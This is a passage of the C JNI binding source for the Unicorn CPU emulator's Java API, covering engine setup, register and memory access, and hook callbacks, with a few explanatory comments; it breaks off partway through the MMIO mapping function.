Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /** Note: JNI function signatures and names must be kept in sync with unicorn_Unicorn.h, which is in turn auto-generated by `javac -h`. 
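Illustrative example (an addition for clarity, not from the original note): a Java declaration such as private static native long _open(int arch, int mode); in Unicorn.java surfaces here as JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1open(JNIEnv *, jclass, jint, jint), because JNI name mangling escapes the underscore in _open as _1open and prefixes the package and class name. Renaming either side without regenerating the header breaks symbol resolution at load time.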
*/ #include <jni.h> #include "unicorn/platform.h" #include <unicorn/unicorn.h> #include <unicorn/x86.h> #include <unicorn/arm64.h> #include <stdlib.h> #include "unicorn_Unicorn.h" static JavaVM *cachedJVM; JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *jvm, void *reserved) { cachedJVM = jvm; return JNI_VERSION_1_6; } static void throwUnicornException(JNIEnv *env, uc_err err) { jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); const char *msg = uc_strerror(err); (*env)->ThrowNew(env, clazz, msg); } static void throwCustomUnicornException(JNIEnv *env, const char *msg) { jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); (*env)->ThrowNew(env, clazz, msg); } static void throwOutOfMemoryError(JNIEnv *env, char *message) { jclass clazz = (*env)->FindClass(env, "java/lang/OutOfMemoryError"); (*env)->ThrowNew(env, clazz, message); } static jobject makeX86_MMR(JNIEnv *env, const uc_x86_mmr *mmr) { if (mmr == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/X86_MMR"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "<init>", "(JIIS)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jlong)mmr->base, (jint)mmr->limit, (jint)mmr->flags, (jshort)mmr->selector); } static jobject makeArm64_CP(JNIEnv *env, const uc_arm64_cp_reg *cp_reg) { if (cp_reg == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/Arm64_CP"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "<init>", "(IIIIIJ)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jint)cp_reg->crn, (jint)cp_reg->crm, (jint)cp_reg->op0, (jint)cp_reg->op1, (jint)cp_reg->op2, (jlong)cp_reg->val); } static jobject makeTranslationBlock(JNIEnv *env, const uc_tb *tb) { if (tb == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/TranslationBlock"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "<init>", "(JII)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jlong)tb->pc, (jint)tb->icount, (jint)tb->size); } struct hook_wrapper { uc_hook uc_hh; jobject unicorn; jobject hook_obj; jmethodID hook_meth; jobject user_data; }; static bool hookErrorCheck(uc_engine *uc, JNIEnv *env) { /* If a hook throws an exception, we want to report it as soon as possible. Additionally, once an exception is set, calling further hooks is inadvisable. Therefore, try to stop the emulator as soon as an exception is detected.
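Every callback below follows the same sketch: invoke the Java hook, then consult this check before trusting the result, e.g. jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, ...); if (hookErrorCheck(uc, env)) { return 0; } Once an exception is pending, the value returned by JNI is unreliable, so a neutral default is handed back to the emulator instead.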
*/ if ((*env)->ExceptionCheck(env)) { uc_emu_stop(uc); return true; } return false; } static const char *const sig_InterruptHook = "(Lunicorn/Unicorn;ILjava/lang/Object;)V"; static void cb_hookintr(uc_engine *uc, uint32_t intno, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)intno, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_InHook = "(Lunicorn/Unicorn;IILjava/lang/Object;)I"; static uint32_t cb_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)port, (jint)size, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (uint32_t)result; } static const char *const sig_OutHook = "(Lunicorn/Unicorn;IIILjava/lang/Object;)V"; static void cb_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)port, (jint)size, (jint)value, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_SyscallHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)V"; static void cb_insn_syscall(struct uc_struct *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_CpuidHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)I"; static int cb_insn_cpuid(struct uc_struct *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (int)result; } static const char *const sig_Arm64SysHook = "(Lunicorn/Unicorn;ILunicorn/Arm64_CP;Ljava/lang/Object;)I"; static uint32_t cb_insn_sys(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jobject jcp_reg = makeArm64_CP(env, cp_reg); if (!jcp_reg) { hookErrorCheck(uc, env); return 0; } jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)reg, jcp_reg, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (uint32_t)result; } static const char *const sig_CodeHook = "(Lunicorn/Unicorn;JILjava/lang/Object;)V"; static void cb_hookcode(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)address, (jint)size, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_EventMemHook = "(Lunicorn/Unicorn;IJIJLjava/lang/Object;)Z"; static bool cb_eventmem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, 
(void **)&env, NULL); struct hook_wrapper *hh = user_data; jboolean result = (*env)->CallBooleanMethod( env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)type, (jlong)address, (jint)size, (jlong)value, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } return result != JNI_FALSE; } static const char *const sig_MemHook = "(Lunicorn/Unicorn;IJIJLjava/lang/Object;)V"; static void cb_hookmem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)type, (jlong)address, (jint)size, (jlong)value, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_InvalidInstructionHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)Z"; static bool cb_hookinsn_invalid(uc_engine *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jboolean result = (*env)->CallBooleanMethod( env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } return result != JNI_FALSE; } static const char *const sig_EdgeGeneratedHook = "(Lunicorn/Unicorn;Lunicorn/TranslationBlock;" "Lunicorn/TranslationBlock;Ljava/lang/Object;)V"; static void cb_edge_gen(uc_engine *uc, uc_tb *cur_tb, uc_tb *prev_tb, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jobject jcur_tb = makeTranslationBlock(env, cur_tb); if (!jcur_tb) { hookErrorCheck(uc, env); return; } jobject jprev_tb = makeTranslationBlock(env, prev_tb); if (!jprev_tb) { hookErrorCheck(uc, env); return; } (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, jcur_tb, jprev_tb, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_TcgOpcodeHook = "(Lunicorn/Unicorn;JJJILjava/lang/Object;)V"; static void cb_tcg_op_2(uc_engine *uc, uint64_t address, uint64_t arg1, uint64_t arg2, uint32_t size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)address, (jlong)arg1, (jlong)arg2, (jint)size, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_TlbFillHook = "(Lunicorn/Unicorn;JILjava/lang/Object;)J"; static bool cb_tlbevent(uc_engine *uc, uint64_t vaddr, uc_mem_type type, uc_tlb_entry *entry, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jlong result = (*env)->CallLongMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)vaddr, (jint)type, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } if (result == -1L) { return false; } else { entry->paddr = result & ~UC_PROT_ALL; entry->perms = result & UC_PROT_ALL; return true; } } static const char *const sig_MmioReadHandler = "(Lunicorn/Unicorn;JILjava/lang/Object;)J"; static uint64_t cb_mmio_read(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jlong result = (*env)->CallLongMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)offset, (jint)size, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return 
(uint64_t)result; } static const char *const sig_MmioWriteHandler = "(Lunicorn/Unicorn;JIJLjava/lang/Object;)V"; static void cb_mmio_write(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)offset, (jint)size, (jlong)value, hh->user_data); hookErrorCheck(uc, env); } /* * Class: unicorn_Unicorn * Method: _open * Signature: (II)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1open(JNIEnv *env, jclass clazz, jint arch, jint mode) { uc_engine *eng = NULL; uc_err err = uc_open(arch, mode, &eng); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return (jlong)eng; } /* * Class: unicorn_Unicorn * Method: _close * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1close(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_close((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _emu_start * Signature: (JJJJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1emu_1start( JNIEnv *env, jclass clazz, jlong uc, jlong begin, jlong until, jlong timeout, jlong count) { uc_err err = uc_emu_start((uc_engine *)uc, begin, until, timeout, (size_t)count); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _emu_stop * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1emu_1stop(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_emu_stop((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } static uc_err generic_reg_read(jlong ptr, jint isContext, jint regid, void *result, size_t *size) { if (isContext) { return uc_context_reg_read2((uc_context *)ptr, regid, result, size); } else { return uc_reg_read2((uc_engine *)ptr, regid, result, size); } } static uc_err generic_reg_write(jlong ptr, jint isContext, jint regid, const void *value, size_t *size) { if (isContext) { return uc_context_reg_write2((uc_context *)ptr, regid, value, size); } else { return uc_reg_write2((uc_engine *)ptr, regid, value, size); } } /* * Class: unicorn_Unicorn * Method: _reg_read_long * Signature: (JII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1long( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid) { uint64_t result = 0; size_t size = 8; uc_err err = generic_reg_read(ptr, isContext, regid, &result, &size); /* TODO: If the host is big-endian and size < 8 after the read, the result must be transposed to the least-significant bytes. 
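A possible fix (a sketch, untested and not project code): on a big-endian host, a size-byte register value occupies the most-significant bytes of the 8-byte buffer, so right-aligning it with if (size < 8) { result >>= (8 - size) * 8; } should recover the numeric value.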
*/ if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _reg_read_bytes * Signature: (JII[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1read_1bytes( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jbyteArray data) { jbyte *arr = (*env)->GetByteArrayElements(env, data, NULL); size_t size = (*env)->GetArrayLength(env, data); uc_err err = generic_reg_read(ptr, isContext, regid, arr, &size); (*env)->ReleaseByteArrayElements(env, data, arr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_write_long * Signature: (JIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1long(JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jlong value) { uint64_t cvalue = value; size_t size = 8; uc_err err = generic_reg_write(ptr, isContext, regid, &cvalue, &size); /* TODO: If the host is big-endian and size < 8 after the write, we need to redo the write with the pointer shifted appropriately */ if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_write_bytes * Signature: (JII[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1bytes( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jbyteArray data) { jbyte *arr = (*env)->GetByteArrayElements(env, data, NULL); size_t size = (*env)->GetArrayLength(env, data); uc_err err = generic_reg_write(ptr, isContext, regid, arr, &size); (*env)->ReleaseByteArrayElements(env, data, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_x86_mmr * Signature: (JII)Lunicorn/X86_MMR; */ JNIEXPORT jobject JNICALL Java_unicorn_Unicorn__1reg_1read_1x86_1mmr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid) { uc_x86_mmr reg = {0}; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, regid, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return makeX86_MMR(env, &reg); } /* * Class: unicorn_Unicorn * Method: _reg_write_x86_mmr * Signature: (JIISJII)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1x86_1mmr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jshort selector, jlong base, jint limit, jint flags) { uc_x86_mmr reg = {0}; reg.selector = selector; reg.base = base; reg.limit = limit; reg.flags = flags; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, regid, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_x86_msr * Signature: (JII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1x86_1msr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint rid) { uc_x86_msr reg = {0}; reg.rid = rid; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_X86_REG_MSR, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.value; } /* * Class: unicorn_Unicorn * Method: _reg_write_x86_msr * Signature: (JIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1x86_1msr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint rid, jlong value) { uc_x86_msr reg = {0}; reg.rid = rid; reg.value = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_X86_REG_MSR, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err);
return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_arm_cp * Signature: (JIIIIIIII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1arm_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint cp, jint is64, jint sec, jint crn, jint crm, jint opc1, jint opc2) { uc_arm_cp_reg reg = {0}; reg.cp = cp; reg.is64 = is64; reg.sec = sec; reg.crn = crn; reg.crm = crm; reg.opc1 = opc1; reg.opc2 = opc2; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_ARM_REG_CP_REG, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.val; } /* * Class: unicorn_Unicorn * Method: _reg_write_arm_cp * Signature: (JIIIIIIIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1arm_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint cp, jint is64, jint sec, jint crn, jint crm, jint opc1, jint opc2, jlong value) { uc_arm_cp_reg reg = {0}; reg.cp = cp; reg.is64 = is64; reg.sec = sec; reg.crn = crn; reg.crm = crm; reg.opc1 = opc1; reg.opc2 = opc2; reg.val = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_ARM_REG_CP_REG, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_arm64_cp * Signature: (JIIIIII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1arm64_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint crn, jint crm, jint op0, jint op1, jint op2) { uc_arm64_cp_reg reg = {0}; reg.crn = crn; reg.crm = crm; reg.op0 = op0; reg.op1 = op1; reg.op2 = op2; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_ARM64_REG_CP_REG, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.val; } /* * Class: unicorn_Unicorn * Method: _reg_write_arm64_cp * Signature: (JIIIIIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1arm64_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint crn, jint crm, jint op0, jint op1, jint op2, jlong value) { uc_arm64_cp_reg reg = {0}; reg.crn = crn; reg.crm = crm; reg.op0 = op0; reg.op1 = op1; reg.op2 = op2; reg.val = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_ARM64_REG_CP_REG, &reg, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_read * Signature: (JJ[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1read(JNIEnv *env, jclass clazz, jlong uc, jlong address, jbyteArray dest) { jsize size = (*env)->GetArrayLength(env, dest); jbyte *arr = (*env)->GetByteArrayElements(env, dest, NULL); uc_err err = uc_mem_read((uc_engine *)uc, address, arr, size); (*env)->ReleaseByteArrayElements(env, dest, arr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_write * Signature: (JJ[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1write(JNIEnv *env, jclass clazz, jlong uc, jlong address, jbyteArray src) { jsize size = (*env)->GetArrayLength(env, src); jbyte *arr = (*env)->GetByteArrayElements(env, src, NULL); uc_err err = uc_mem_write((uc_engine *)uc, address, arr, size); (*env)->ReleaseByteArrayElements(env, src, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _version * Signature: ()I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1version(JNIEnv *env, jclass clazz) { return (jint)uc_version(NULL, NULL); } /* * Class:
unicorn_Unicorn * Method: _arch_supported * Signature: (I)Z */ JNIEXPORT jboolean JNICALL Java_unicorn_Unicorn__1arch_1supported(JNIEnv *env, jclass clazz, jint arch) { return (jboolean)(uc_arch_supported((uc_arch)arch) != 0); } /* * Class: unicorn_Unicorn * Method: _query * Signature: (JI)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1query(JNIEnv *env, jclass clazz, jlong uc, jint type) { size_t result; uc_err err = uc_query((uc_engine *)uc, type, &result); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _errno * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1errno(JNIEnv *env, jclass clazz, jlong uc) { return uc_errno((uc_engine *)uc); } /* * Class: unicorn_Unicorn * Method: _strerror * Signature: (I)Ljava/lang/String; */ JNIEXPORT jstring JNICALL Java_unicorn_Unicorn__1strerror(JNIEnv *env, jclass clazz, jint code) { const char *err = uc_strerror((int)code); return (*env)->NewStringUTF(env, err); } static void deleteHookWrapper(JNIEnv *env, struct hook_wrapper *hh) { if (hh) { if (hh->unicorn) (*env)->DeleteGlobalRef(env, hh->unicorn); if (hh->hook_obj) (*env)->DeleteGlobalRef(env, hh->hook_obj); if (hh->user_data) (*env)->DeleteGlobalRef(env, hh->user_data); free(hh); } } static struct hook_wrapper *makeHookWrapper(JNIEnv *env, jobject self, jobject callback, jobject user_data, const char *hook_name, const char *hook_sig) { struct hook_wrapper *hh = calloc(1, sizeof(struct hook_wrapper)); if (!hh) { throwOutOfMemoryError(env, "Unable to allocate hook_wrapper"); return NULL; } hh->unicorn = (*env)->NewGlobalRef(env, self); if (!hh->unicorn) { deleteHookWrapper(env, hh); return NULL; } hh->hook_obj = (*env)->NewGlobalRef(env, callback); if (!hh->hook_obj) { deleteHookWrapper(env, hh); return NULL; } jclass clazz = (*env)->GetObjectClass(env, callback); if (!clazz) { deleteHookWrapper(env, hh); return NULL; } hh->hook_meth = (*env)->GetMethodID(env, clazz, hook_name, hook_sig); if (!hh->hook_meth) { deleteHookWrapper(env, hh); return NULL; } if (user_data) { hh->user_data = (*env)->NewGlobalRef(env, user_data); if (!hh->user_data) { deleteHookWrapper(env, hh); return NULL; } } return hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJ)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJ( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_INTR) { hook_sig = sig_InterruptHook; hook_callback = cb_hookintr; } else if (type == UC_HOOK_CODE || type == UC_HOOK_BLOCK) { hook_sig = sig_CodeHook; // also BlockHook hook_callback = cb_hookcode; } else if ((type & UC_HOOK_MEM_INVALID) && !(type & ~UC_HOOK_MEM_INVALID)) { hook_sig = sig_EventMemHook; hook_callback = cb_eventmem; } else if ((type & UC_HOOK_MEM_VALID) && !(type & ~UC_HOOK_MEM_VALID)) { hook_sig = sig_MemHook; hook_callback = cb_hookmem; } else if (type == UC_HOOK_INSN_INVALID) { hook_sig = sig_InvalidInstructionHook; hook_callback = cb_hookinsn_invalid; } else if (type == UC_HOOK_EDGE_GENERATED) { hook_sig = sig_EdgeGeneratedHook; hook_callback = cb_edge_gen; } else if (type == UC_HOOK_TLB_FILL) { hook_sig = sig_TlbFillHook; hook_callback = cb_tlbevent; } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == 
NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJI)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJI( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end, jint arg) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_INSN) { switch (arg) { case UC_X86_INS_IN: hook_sig = sig_InHook; hook_callback = cb_insn_in; break; case UC_X86_INS_OUT: hook_sig = sig_OutHook; hook_callback = cb_insn_out; break; case UC_X86_INS_SYSCALL: case UC_X86_INS_SYSENTER: hook_sig = sig_SyscallHook; hook_callback = cb_insn_syscall; break; case UC_X86_INS_CPUID: hook_sig = sig_CpuidHook; hook_callback = cb_insn_cpuid; break; case UC_ARM64_INS_MRS: case UC_ARM64_INS_MSR: case UC_ARM64_INS_SYS: case UC_ARM64_INS_SYSL: hook_sig = sig_Arm64SysHook; hook_callback = cb_insn_sys; break; default: throwUnicornException(env, UC_ERR_INSN_INVALID); return 0; } } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end, arg); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJII( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end, jint arg1, jint arg2) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_TCG_OPCODE) { hook_sig = sig_TcgOpcodeHook; hook_callback = cb_tcg_op_2; } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end, arg1, arg2); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_del * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1hook_1del(JNIEnv *env, jclass clazz, jlong uc, jlong hh) { struct hook_wrapper *h = (struct hook_wrapper *)hh; uc_hook_del((uc_engine *)uc, h->uc_hh); if (h->unicorn) { (*env)->DeleteGlobalRef(env, h->unicorn); h->unicorn = NULL; } if (h->hook_obj) { (*env)->DeleteGlobalRef(env, h->hook_obj); h->hook_obj = NULL; } if (h->user_data) { (*env)->DeleteGlobalRef(env, h->user_data); h->user_data = NULL; } } /* * Class: unicorn_Unicorn * Method: _hookwrapper_free * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1hookwrapper_1free(JNIEnv *env, jclass clazz, jlong hh) { deleteHookWrapper(env, (struct hook_wrapper *)hh); } /* * Class: unicorn_Unicorn * Method: _mmio_map * Signature: * (JJJLunicorn/MmioReadHandler;Ljava/lang/Object;Lunicorn/MmioWriteHandler;Ljava/lang/Object;)[J */ JNIEXPORT jlongArray JNICALL Java_unicorn_Unicorn__1mmio_1map( JNIEnv *env, jobject self, jlong uc, jlong address, jlong size, 
